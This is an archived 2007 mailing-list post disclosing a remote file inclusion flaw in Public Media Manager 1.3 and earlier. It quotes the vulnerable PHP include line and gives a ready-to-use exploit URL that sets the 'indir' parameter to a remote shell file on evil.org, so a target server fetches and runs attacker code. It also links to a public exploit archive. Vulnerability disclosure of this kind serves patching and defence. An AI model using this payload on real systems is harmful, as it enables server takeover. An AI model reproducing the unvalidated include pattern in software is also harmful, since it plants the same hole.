Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting

Public Media Manager <= 1.3 Remote File Inclusion Vulnerability

From: <0in.email(at)gmail.com>
Date: Sat Sep 29 2007 - 02:08:03 EDT


#f0und bY 0in
#Contact: 0in.email@gmail.com
#Download:http://pmm-cms.sourceforge.net/
#Greetings to:All Dark-Coders team #members:Die-angel,Slim,Umbro
#and other friends #Joker186,Artysta,Kaja,Wojto111,Rade0n
BUG:
news/newstopic_inc.php:2:if (!empty($indir)) include_once ($indir)."/newsdb/config.php";

Expl0it:
http://x.com/[path]/news/newstopic_inc.php?indir=http://evil.org/shell.txt?

Orginal first post & exploit: http://milw0rm.com/exploits/4465 Received on Sat Sep 29 12:10:29 2007

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:18:34 EDT


Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library